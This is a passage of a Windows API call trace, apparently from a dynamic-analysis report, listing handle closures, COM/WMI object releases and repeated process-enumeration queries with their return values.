CloseHandle (hObject=0x518) returned 1 [0139.775] CloseHandle (hObject=0x52c) returned 1 [0139.775] CloseHandle (hObject=0x4e0) returned 1 [0140.801] CloseHandle (hObject=0x478) returned 1 [0140.801] CloseHandle (hObject=0x514) returned 1 [0140.802] CloseHandle (hObject=0x4d0) returned 1 [0140.802] CloseHandle (hObject=0x52c) returned 1 [0140.802] CloseHandle (hObject=0x598) returned 1 [0140.802] CloseHandle (hObject=0x4a0) returned 1 [0140.802] CloseHandle (hObject=0x4f4) returned 1 [0140.802] CloseHandle (hObject=0x444) returned 1 [0140.895] CloseHandle (hObject=0x464) returned 1 [0140.896] CloseHandle (hObject=0x46c) returned 1 [0140.896] CloseHandle (hObject=0x3f0) returned 1 [0140.896] CloseHandle (hObject=0x554) returned 1 [0140.896] CloseHandle (hObject=0x4a4) returned 1 [0140.896] CloseHandle (hObject=0x448) returned 1 [0140.896] CloseHandle (hObject=0x5a4) returned 1 [0140.896] CloseHandle (hObject=0x588) returned 1 [0140.897] CloseHandle (hObject=0x4b0) returned 1 [0140.897] CloseHandle (hObject=0x418) returned 1 [0140.897] CloseHandle (hObject=0x548) returned 1 [0140.897] CloseHandle (hObject=0x50c) returned 1 [0140.897] CloseHandle (hObject=0x590) returned 1 [0140.898] CloseHandle (hObject=0x3c4) returned 1 [0140.898] CloseHandle (hObject=0x520) returned 1 [0140.898] CloseHandle (hObject=0x5a0) returned 1 [0141.208] CloseHandle (hObject=0x4f8) returned 1 [0141.209] CloseHandle (hObject=0x560) returned 1 [0145.024] CloseHandle (hObject=0x46c) returned 1 [0145.025] CloseHandle (hObject=0x4a4) returned 1 [0145.025] CloseHandle (hObject=0x448) returned 1 [0145.025] CloseHandle (hObject=0x5a0) returned 1 [0145.025] CloseHandle (hObject=0x3f0) returned 1 [0145.025] CloseHandle (hObject=0x5a4) returned 1 [0145.035] CloseHandle (hObject=0x548) returned 1 [0145.035] CloseHandle (hObject=0x520) returned 1 [0145.035] CloseHandle (hObject=0x590) returned 1 [0145.035] CloseHandle (hObject=0x418) returned 1 [0145.035] CloseHandle (hObject=0x518) returned 1 [0145.036] CloseHandle (hObject=0x560) returned 1 [0145.036] CloseHandle (hObject=0x3c4) returned 1 [0145.036] CloseHandle (hObject=0x588) returned 1 [0145.036] CloseHandle (hObject=0x4e0) returned 1 [0145.036] CloseHandle (hObject=0x4f8) returned 1 [0145.712] CloseHandle (hObject=0x500) returned 1 [0145.712] CloseHandle (hObject=0x464) returned 1 [0148.429] CloseHandle (hObject=0x558) returned 1 [0148.429] CloseHandle (hObject=0x174) returned 1 [0148.429] CloseHandle (hObject=0x514) returned 1 [0148.429] CloseHandle (hObject=0x52c) returned 1 [0148.429] CloseHandle (hObject=0x4a0) returned 1 [0148.429] CloseHandle (hObject=0x46c) returned 1 [0148.429] CloseHandle (hObject=0x448) returned 1 [0148.429] CloseHandle (hObject=0x3f0) returned 1 [0148.430] CloseHandle (hObject=0x548) returned 1 [0148.430] CloseHandle (hObject=0x590) returned 1 [0148.430] CloseHandle (hObject=0x518) returned 1 [0148.430] CloseHandle (hObject=0x3c4) returned 1 [0148.430] CloseHandle (hObject=0x500) returned 1 [0148.430] CloseHandle (hObject=0x4f8) returned 1 [0148.430] CloseHandle (hObject=0x520) returned 1 [0148.430] CloseHandle (hObject=0x598) returned 1 [0148.430] CloseHandle (hObject=0x4a4) returned 1 [0148.430] CloseHandle (hObject=0x418) returned 1 [0148.431] CloseHandle (hObject=0x4d0) returned 1 [0148.431] CloseHandle (hObject=0x554) returned 1 [0148.431] CloseHandle (hObject=0x580) returned 1 [0148.431] CloseHandle (hObject=0x5a0) returned 1 [0148.431] CloseHandle (hObject=0x560) returned 1 [0148.431] CloseHandle (hObject=0x4f4) returned 1 [0148.431] CloseHandle (hObject=0x478) returned 1 [0148.431] CloseHandle (hObject=0x588) returned 1 [0148.431] CloseHandle (hObject=0x5a4) returned 1 [0148.431] CloseHandle (hObject=0x464) returned 1 [0148.634] CloseHandle (hObject=0x444) returned 1 [0148.635] CloseHandle (hObject=0x504) returned 1 [0149.022] CloseHandle (hObject=0x540) returned 1 [0149.022] CloseHandle (hObject=0x5a8) returned 1 [0152.029] CloseHandle (hObject=0x594) returned 1 [0152.029] CloseHandle (hObject=0x5c8) returned 1 [0152.029] CloseHandle (hObject=0x5d0) returned 1 [0152.029] CloseHandle (hObject=0x574) returned 1 [0152.029] CloseHandle (hObject=0x5b8) returned 1 [0152.029] CloseHandle (hObject=0x5c0) returned 1 [0152.029] CloseHandle (hObject=0x5b0) returned 1 [0152.029] CloseHandle (hObject=0x5d8) returned 1 [0152.029] CloseHandle (hObject=0x584) returned 1 [0152.029] CloseHandle (hObject=0x200) returned 1 [0152.029] CloseHandle (hObject=0x2c4) returned 1 [0152.030] CloseHandle (hObject=0x4c8) returned 1 [0152.030] CloseHandle (hObject=0x174) returned 1 [0152.030] CloseHandle (hObject=0x514) returned 1 [0152.030] CloseHandle (hObject=0x4a0) returned 1 [0152.030] CloseHandle (hObject=0x448) returned 1 [0152.030] CloseHandle (hObject=0x548) returned 1 [0152.030] CloseHandle (hObject=0x518) returned 1 [0152.030] CloseHandle (hObject=0x500) returned 1 [0152.030] CloseHandle (hObject=0x520) returned 1 [0152.031] CloseHandle (hObject=0x59c) returned 1 [0152.031] CloseHandle (hObject=0x534) returned 1 [0152.031] CloseHandle (hObject=0x52c) returned 1 [0152.031] CloseHandle (hObject=0x3c4) returned 1 [0152.031] CloseHandle (hObject=0x3f0) returned 1 [0152.031] CloseHandle (hObject=0x4b0) returned 1 [0152.031] CloseHandle (hObject=0x58c) returned 1 [0152.031] CloseHandle (hObject=0x5d4) returned 1 [0152.031] CloseHandle (hObject=0x5cc) returned 1 [0152.031] CloseHandle (hObject=0x47c) returned 1 [0152.032] CloseHandle (hObject=0x57c) returned 1 [0152.032] CloseHandle (hObject=0x5bc) returned 1 [0152.032] CloseHandle (hObject=0x4f8) returned 1 [0152.032] CloseHandle (hObject=0x46c) returned 1 [0152.032] CloseHandle (hObject=0x568) returned 1 [0152.032] CloseHandle (hObject=0x590) returned 1 [0152.032] CloseHandle (hObject=0x56c) returned 1 [0152.032] CloseHandle (hObject=0x5b4) returned 1 [0152.032] CloseHandle (hObject=0x5c4) returned 1 [0152.032] CloseHandle (hObject=0x598) returned 1 [0152.044] CloseHandle (hObject=0x4d0) returned 1 [0152.044] CloseHandle (hObject=0x560) returned 1 [0152.044] CloseHandle (hObject=0x540) returned 1 [0152.044] CloseHandle (hObject=0x464) returned 1 [0152.044] CloseHandle (hObject=0x4a4) returned 1 [0152.044] CloseHandle (hObject=0x478) returned 1 [0152.044] CloseHandle (hObject=0x444) returned 1 [0152.045] CloseHandle (hObject=0x580) returned 1 [0152.045] CloseHandle (hObject=0x5a4) returned 1 [0152.045] CloseHandle (hObject=0x550) returned 1 [0152.045] CloseHandle (hObject=0x588) returned 1 [0152.045] CloseHandle (hObject=0x418) returned 1 [0152.045] CloseHandle (hObject=0x5a8) returned 1 [0152.045] CloseHandle (hObject=0x554) returned 1 [0152.045] CloseHandle (hObject=0x524) returned 1 [0152.045] CloseHandle (hObject=0x50c) returned 1 [0152.046] CloseHandle (hObject=0x4f4) returned 1 [0152.046] CloseHandle (hObject=0x5a0) returned 1 [0152.583] CloseHandle (hObject=0x5e0) returned 1 [0152.583] CloseHandle (hObject=0x5dc) returned 1 [0156.325] CloseHandle (hObject=0x524) returned 1 [0156.325] CloseHandle (hObject=0x5e0) returned 1 [0156.326] CloseHandle (hObject=0x50c) returned 1 [0156.326] CloseHandle (hObject=0x4e0) returned 1 [0156.326] CloseHandle (hObject=0x5e4) returned 1 [0156.326] CloseHandle (hObject=0x554) returned 1 [0156.326] CloseHandle (hObject=0x5a4) returned 1 [0156.326] CloseHandle (hObject=0x588) returned 1 [0156.326] CloseHandle (hObject=0x418) returned 1 [0156.326] CloseHandle (hObject=0x5a8) returned 1 [0156.326] CloseHandle (hObject=0x4f4) returned 1 [0156.327] CloseHandle (hObject=0x5a0) returned 1 [0156.327] CloseHandle (hObject=0x550) returned 1 [0157.497] CloseHandle (hObject=0x580) returned 1 [0157.498] CloseHandle (hObject=0x444) returned 1 [0160.781] CloseHandle (hObject=0x550) returned 1 [0160.781] CloseHandle (hObject=0x4a4) returned 1 [0160.781] CloseHandle (hObject=0x478) returned 1 [0160.781] CloseHandle (hObject=0x444) returned 1 [0182.891] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0182.892] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0182.892] WbemLocator:IUnknown:Release (This=0x5210a10) returned 0x1 [0182.892] WbemLocator:IUnknown:Release (This=0x5210a10) returned 0x0 [0183.022] CloseHandle (hObject=0x530) returned 1 [0198.711] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0198.711] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.711] IUnknown:Release (This=0x5227618) returned 0x2 [0198.711] IUnknown:Release (This=0x5227618) returned 0x1 [0198.711] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.711] IUnknown:Release (This=0x5228d78) returned 0x2 [0198.711] IUnknown:Release (This=0x5228d78) returned 0x1 [0198.711] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.711] IUnknown:Release (This=0x5227a00) returned 0x2 [0198.711] IUnknown:Release (This=0x5227a00) returned 0x1 [0198.711] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.711] IUnknown:Release (This=0x521d5b0) returned 0x2 [0198.711] IUnknown:Release (This=0x521d5b0) returned 0x1 [0198.711] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.711] IUnknown:Release (This=0x521d9e8) returned 0x2 [0198.711] IUnknown:Release (This=0x521d9e8) returned 0x1 [0198.711] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.711] IUnknown:Release (This=0x521ee80) returned 0x2 [0198.711] IUnknown:Release (This=0x521ee80) returned 0x1 [0198.711] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.711] IUnknown:Release (This=0x521f2b8) returned 0x2 [0198.711] IUnknown:Release (This=0x521f2b8) returned 0x1 [0198.711] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.711] IUnknown:Release (This=0x521fba8) returned 0x2 [0198.711] IUnknown:Release (This=0x521fba8) returned 0x1 [0198.711] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.711] IUnknown:Release (This=0x52200a8) returned 0x2 [0198.711] IUnknown:Release (This=0x52200a8) returned 0x1 [0198.711] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.711] IUnknown:Release (This=0x52231d8) returned 0x2 [0198.712] IUnknown:Release (This=0x52231d8) returned 0x1 [0198.712] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.712] IUnknown:Release (This=0x5223ac0) returned 0x2 [0198.712] IUnknown:Release (This=0x5223ac0) returned 0x1 [0198.712] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.712] IUnknown:Release (This=0x5223ef8) returned 0x2 [0198.712] IUnknown:Release (This=0x5223ef8) returned 0x1 [0198.712] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0198.712] IUnknown:Release (This=0x5224d28) returned 0x2 [0198.712] IUnknown:Release (This=0x5224d28) returned 0x1 [0198.712] IUnknown:Release (This=0x5224d28) returned 0x0 [0198.712] IUnknown:Release (This=0x5223ef8) returned 0x0 [0198.712] IUnknown:Release (This=0x5223ac0) returned 0x0 [0198.712] IUnknown:Release (This=0x52231d8) returned 0x0 [0198.712] IUnknown:Release (This=0x52200a8) returned 0x0 [0198.712] IUnknown:Release (This=0x521fba8) returned 0x0 [0198.712] IUnknown:Release (This=0x521f2b8) returned 0x0 [0198.713] IUnknown:Release (This=0x521ee80) returned 0x0 [0198.713] IUnknown:Release (This=0x521d9e8) returned 0x0 [0198.713] IUnknown:Release (This=0x521d5b0) returned 0x0 [0198.713] IUnknown:Release (This=0x5227a00) returned 0x0 [0198.713] IUnknown:Release (This=0x5227618) returned 0x0 [0198.713] IUnknown:Release (This=0x5228d78) returned 0x0 [0198.713] CoGetContextToken (in: pToken=0x438f800 | out: pToken=0x438f800) returned 0x0 [0198.713] WbemLocator:IUnknown:Release (This=0x73fecc) returned 0x1 [0198.713] IUnknown:Release (This=0x521089c) returned 0x0 [0200.308] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0200.308] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.308] WbemDefPath:IUnknown:Release (This=0x521cbf0) returned 0x1 [0200.308] WbemDefPath:IUnknown:Release (This=0x521cbf0) returned 0x0 [0200.309] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.309] WbemDefPath:IUnknown:Release (This=0x5210bf8) returned 0x1 [0200.309] WbemDefPath:IUnknown:Release (This=0x5210bf8) returned 0x0 [0200.309] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.309] WbemDefPath:IUnknown:Release (This=0x521d4b0) returned 0x1 [0200.309] WbemDefPath:IUnknown:Release (This=0x521d4b0) returned 0x0 [0200.309] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.309] WbemDefPath:IUnknown:Release (This=0x521d8e8) returned 0x1 [0200.309] WbemDefPath:IUnknown:Release (This=0x521d8e8) returned 0x0 [0200.309] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.309] WbemDefPath:IUnknown:Release (This=0x521ed80) returned 0x1 [0200.309] WbemDefPath:IUnknown:Release (This=0x521ed80) returned 0x0 [0200.309] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.309] WbemDefPath:IUnknown:Release (This=0x521f1b8) returned 0x1 [0200.309] WbemDefPath:IUnknown:Release (This=0x521f1b8) returned 0x0 [0200.309] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.309] WbemDefPath:IUnknown:Release (This=0x521f6a8) returned 0x1 [0200.309] WbemDefPath:IUnknown:Release (This=0x521f6a8) returned 0x0 [0200.309] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.309] WbemDefPath:IUnknown:Release (This=0x521ffa8) returned 0x1 [0200.309] WbemDefPath:IUnknown:Release (This=0x521ffa8) returned 0x0 [0200.309] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.309] WbemDefPath:IUnknown:Release (This=0x5220240) returned 0x1 [0200.309] WbemDefPath:IUnknown:Release (This=0x5220240) returned 0x0 [0200.310] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.310] WbemDefPath:IUnknown:Release (This=0x52239c0) returned 0x1 [0200.310] WbemDefPath:IUnknown:Release (This=0x52239c0) returned 0x0 [0200.310] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.310] WbemDefPath:IUnknown:Release (This=0x5223df8) returned 0x1 [0200.310] WbemDefPath:IUnknown:Release (This=0x5223df8) returned 0x0 [0200.310] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.310] WbemDefPath:IUnknown:Release (This=0x5224090) returned 0x1 [0200.310] WbemDefPath:IUnknown:Release (This=0x5224090) returned 0x0 [0200.310] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0200.310] WbemDefPath:IUnknown:Release (This=0x5224190) returned 0x1 [0200.310] WbemDefPath:IUnknown:Release (This=0x5224190) returned 0x0 [0202.077] CloseHandle (hObject=0x368) returned 1 [0202.078] CloseHandle (hObject=0x530) returned 1 [0202.078] CloseHandle (hObject=0x4dc) returned 1 [0202.078] CloseHandle (hObject=0x45c) returned 1 [0202.078] CloseHandle (hObject=0x334) returned 1 [0202.078] CloseHandle (hObject=0x3f8) returned 1 [0202.078] CloseHandle (hObject=0x374) returned 1 [0202.078] CloseHandle (hObject=0x3c8) returned 1 [0202.078] CloseHandle (hObject=0x43c) returned 1 [0202.079] CloseHandle (hObject=0x2e8) returned 1 [0202.079] CloseHandle (hObject=0x470) returned 1 [0202.254] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0202.254] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0202.254] WbemLocator:IUnknown:Release (This=0x73ffbc) returned 0x1 [0202.254] WbemLocator:IUnknown:Release (This=0x521cbdc) returned 0x0 [0246.290] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0246.290] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0246.290] WbemLocator:IUnknown:Release (This=0x5223608) returned 0x1 [0246.290] WbemLocator:IUnknown:Release (This=0x5223608) returned 0x0 [0246.290] CoGetContextToken (in: pToken=0x438f800 | out: pToken=0x438f800) returned 0x0 [0246.290] WbemLocator:IUnknown:Release (This=0x73ffbc) returned 0x1 [0246.290] IUnknown:Release (This=0x521089c) returned 0x0 [0246.329] CloseHandle (hObject=0x410) returned 1 [0246.371] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0246.371] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0246.371] WbemLocator:IUnknown:Release (This=0x74037c) returned 0x1 [0246.371] WbemLocator:IUnknown:Release (This=0x521095c) returned 0x0 [0257.236] EtwEventUnregister () returned 0x0 [0257.236] EtwEventUnregister () returned 0x0 [0257.237] CloseHandle (hObject=0x58c) returned 1 [0257.250] UnmapViewOfFile (lpBaseAddress=0x480000) returned 1 [0257.251] CloseHandle (hObject=0x2d4) returned 1 [0257.252] UnmapViewOfFile (lpBaseAddress=0x3f0000) returned 1 [0257.253] CloseHandle (hObject=0x2b0) returned 1 [0257.253] RegCloseKey (hKey=0x80000004) returned 0x0 [0257.254] CloseHandle (hObject=0x590) returned 1 [0257.254] CloseHandle (hObject=0x5b8) returned 1 [0257.255] CloseHandle (hObject=0x174) returned 1 [0257.255] CloseHandle (hObject=0x28c) returned 1 [0257.256] CloseHandle (hObject=0x1fc) returned 1 [0257.258] CoGetContextToken (in: pToken=0x438f628 | out: pToken=0x438f628) returned 0x0 [0257.258] CoGetContextToken (in: pToken=0x438f5b0 | out: pToken=0x438f5b0) returned 0x0 [0257.258] WbemDefPath:IUnknown:Release (This=0x5210978) returned 0x1 [0257.258] WbemDefPath:IUnknown:Release (This=0x5210978) returned 0x0 [0257.258] CoGetContextToken (in: pToken=0x438f628 | out: pToken=0x438f628) returned 0x0 [0257.259] CoGetContextToken (in: pToken=0x438f5b0 | out: pToken=0x438f5b0) returned 0x0 [0257.259] WbemLocator:IUnknown:Release (This=0x73fddc) returned 0x0 [0257.314] IUnknown:Release (This=0x6ded28) returned 0x0 [0257.315] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 8 os_tid = 0x560 Thread: id = 9 os_tid = 0x10c Thread: id = 10 os_tid = 0x208 Thread: id = 11 os_tid = 0x364 Thread: id = 12 os_tid = 0x798 Thread: id = 59 os_tid = 0x634 Thread: id = 60 os_tid = 0x180 [0066.360] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0066.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, 